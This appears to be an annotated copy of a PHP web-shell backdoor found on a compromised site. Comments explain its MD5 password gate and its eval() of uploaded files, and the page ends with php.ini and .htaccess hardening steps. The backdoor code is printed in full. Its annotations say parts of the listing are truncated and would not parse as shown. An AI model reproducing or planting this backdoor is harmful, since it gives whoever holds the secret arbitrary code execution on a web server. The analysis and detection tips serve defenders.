<?php
// Level 1 is E_ERROR: only fatal errors are reported, so warnings and notices
// raised by the rest of the script are not reported.
error_reporting(1);
// $HTTP_SERVER_VARS is one of PHP's legacy "long" superglobal arrays. It is
// declared here but never read anywhere in the visible script.
global $HTTP_SERVER_VARS;
/**
 * Prints the given value followed by a newline.
 *
 * @param mixed $t Value interpolated into the echoed string.
 */
function say($t) {
echo "$t\n";
};
/**
 * Prints the MD5 hex digest of "testdata_" followed by $t, on its own line.
 *
 * The script calls this with 'start', 'f', 'pass' and 'end', so every response
 * contains fixed 32-character hex markers. Presumably the remote client matches
 * them to learn which branch ran (not confirmed by anything on this page).
 * Because the inputs are constants, the resulting digests are stable and can be
 * used as signatures when searching HTTP responses or proxy logs.
 *
 * @param string $t Marker name appended to the "testdata_" prefix before hashing.
 */
function testdata($t) {
say(md5("testdata_$t"));
};
// Upload-and-eval backdoor body, kept verbatim as it was found.
// NOTE(review): the bare echo statements on the first and last line of this run
// look truncated (probably markup lost when the page was extracted), so the
// listing does not parse exactly as shown.
//
// Flow of the code below:
//  - prints the 'start' marker;
//  - gate: the MD5 of POST field "p" is loosely compared (==) with a hard-coded
//    digest, i.e. one fixed shared secret and no session or account check;
//  - on a match, the uploaded file "f" is read from its temporary path through
//    the legacy $HTTP_POST_FILES array, with fopen/fread errors silenced by @,
//    and the contents are handed to eval(). Anyone who knows the secret can
//    therefore run arbitrary PHP with the web server's privileges;
//  - if the read yields nothing, the 'f' marker is printed; on a wrong secret
//    the 'pass' marker is printed; the 'end' marker is always printed.
//
// For defenders: this file has no legitimate function to preserve. Remove it and
// establish how it was written to disk. Useful things to search a web root for
// are eval() fed from an upload's tmp_name, @-suppressed fopen/fread on upload
// arrays, and the hard-coded digest below. In access logs, look for multipart
// POST requests to this script's path.
echo "";";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
else{ testdata('f');
};
}else{
testdata('pass');
};
testdata('end');
echo "
?>
Solution:
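I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information. These settings only reduce what the server reveals and switch off risky legacy features; they do not remove a backdoor file like the one above, which still has to be deleted and the way it was uploaded closed: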
allow_url_fopen = Off
register_globals = Off
display_errors = Off
expose_php = Off
log_errors = On
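Also make sure that you add this to your .htaccess file so people can't see your php.ini settings (the <Files> wrapper seems to have been stripped from this listing; without it the two directives would deny access to the whole directory, and on Apache 2.4 the equivalent of the two inner lines is "Require all denied"):
<Files php.ini>
order allow,deny
deny from all
</Files>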
Reference : http://forums.devshed.com/apache-development-15/htaccess-was-hacked-can-you-help-me-with-what-they-512348-2.html